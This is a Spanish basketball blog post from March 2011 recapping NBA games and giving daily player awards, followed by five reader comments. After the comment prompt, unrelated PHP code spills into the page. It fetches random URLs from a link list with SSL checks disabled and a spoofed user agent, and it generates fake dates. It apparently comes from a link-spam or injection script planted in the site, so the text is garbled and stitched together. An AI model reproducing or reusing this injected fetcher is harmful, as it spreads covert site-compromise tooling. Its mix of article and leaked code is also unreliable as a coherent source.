La Crónica (12/03/2011)

13 de March de 2011 por txusma

Que se pare el mundo. Kobe está tendido en el suelo entre gestos de dolor. Las repeticiones muestran como el tobillo izquierdo del escolta angelino se dobla de manera casi antinatural y lo más cenizos piensan ya en esguinces de grado 3, roturas, fracturas o cualquier cosa que impida a Kobe volver a jugar, no ya el partido, sino toda la temporada. Nada más lejos de la realidad. Kobe vuelve cuando faltan 6 minutos para acabar el partido, colaborando en la victoria amarilla sobre los Mavs (96-91). La victoria deja a los Lakers a medio partido de la segunda posición de la conferencia Oeste con un partido más entre ellos por jugarse. Hagan sus apuestas.

En primera posición continúan unos sólidos Spurs que tuvieron que apretar los dientes para imponerse a unos Rockets que nunca perdieron la fe. A pesar de ir perdiendo de 10 puntos a la media parte, llegaron a ponerse por delante en el último cuarto. A partir de ahí un excepcional Tony Parker finiquitó el choque (115-107). En la lucha por las últimos posiciones del Oeste que dan acceso a Playoffs, a parte de la derrota de Houston, derrota también de los Blazers y victorias de Nuggets y Hornets. Los primeros cayeron en Atlanta ante el empuje de un Jeff Teague soberbio en todas las facetas del juego (82-91) y los segundos apalizaron a Detroit (101-131) con JR Smith en uno de esos fantásticos partidos que tiene de vez en cuando. Por su parte, New Orleans derrotó a Sacramento (103-115) con un partido de aquellos de Chris Paul para enmarcar, grabar en vídeo y pasárselo a las generaciones futuras.

En el Este victorias de Heat y Bulls ante Grizzlies y Jazz, respectivamente. Wade y compañía no tuvieron ningún problema para liquidar a unos ositos que fueron más amorosos que nunca (85-118) y Derrick Rose destrozó a los Jazz con 17 puntos en el primer cuarto en la celebración del vigésimo aniversario de la consecución de su primer título (100-118). Por su parte, los Sixers, que tan buen papel llevaban haciendo en las últimos jornadas cayeron de manera estrepitosa ante los Bucks (74-102)  que ponen la directa hacia esa octava plaza que actualmente ocupan los Pacers. Cuestión de tiempo que la consigan.

En el partido insulso de la jornada, victoria de los Clippers ante los Wizards (122-101) con 26 puntos de Griffin, todos anotados en una primera parte para enmarcar. De todas maneras, en el duelo de los mejores rookies de la temporada, un tercero en discordia, Eric Bledsoe se llevó el título.

PREMIOS

MVP: Duelo en la cumbre. 33 puntos, 7 rebotes, 15 asistencias y 5 robos de Chris Paul frente 28 puntos, 5 rebotes, 9 asistencias, 3 robos y 5 tapones de Dwyane Wade.

Rookie: Ni Blake Griffin, ni John Wall, ni Demarcus Cousins. Hoy el rookie del día ha sido Eric Bledsoe gracias a los 23 puntos, 8 rebotes y 6 asistencias que se ha cascado en 22 minutos.

Sorpresa: Como ya hemos comentado en la crónica, anoche el mejor de los Hawks fue Jeff Teague. Su completa actuación (24 puntos, 4 rebotes, 3 asistencias, 5 robos y 1 tapón) fue decisiva para la victoria de su equipo.

Decepción: El backourt de los Grizzlies estuvo sembrado. 3 de 18 entre Michael Conley y Tony Allen. Sam Young también les echó una mano con su 1 de 7.

Esfuerzo en vano: La salida de Deron Williams ha dejado este premio en manos de un viejo conocido. Al Jefferson cuajó otra muy buena actuación de 33 puntos y 18 rebotes pero el rendimiento de los Jazz parece ir en otra dirección.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Denise dice:
    #1

    Partidazo de Lakers, sobre todo ampliando la renta en el rato en el que Kobe estuvo fuera, tremendo Bynum en la zona, bien por fin Blake, e implicación de Artest con ese rebote ofensivo importantisimo y su demostración de biceps una vez más 🙂
    Carmelo who?
    131 puntos de los Nuggets con 8 tíos por encima de los 10 puntos y sin Afflalo y Gallinari.
    Los Spurs no los veo bien ultimamente, ante unos Rockets sin mucho en la pintura y con Scola lesionado, les ha costado mucho doblegarlos.
    Me mojo una vez más, y a pesar de su record, creo que Mavs o Lakers se van a zumbar en playoffs a los Spurs sin necesidad de un septimo partido.

      Citar

  2. Nacho dice:
    #2

    Yo me mojo más, Mavs no tumban los Lakers en una serie ni hartos de vino. (Bueno, depende de que vino)
    Y ojito, que si Dallas se las tienen que ver con los Blazers en primera no se yo… por mucho que digáis que McMillan la caga en PO.
    Ah! y NO aguantando el tipo, y ya queda menos. Los ocho del Oeste me temo que serán los que están, y lo siento por Los Soles (¡qué bonito queda! xD)

      Citar

  3. Denise dice:
    #3

    Otra orgia de puntos la que le estamos dando a los Suns. 80 puntos y todavía quedan 15 minutos.

      Citar

  4. Len Bias dice:
    #4

    Orgía de puntos tambien entre Bucks y Boston… xD

      Citar

  5. Len Bias dice:
    #5

    Se ha roto la racha de Kevin Love!!! Más extraño que ha sido por hacer solo 6 puntos, rebotes ha cogido 12. Y no ha jugado los últimos minutos, parecía que le daba igual (o al menos al entrenador) no seguir con la racha

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>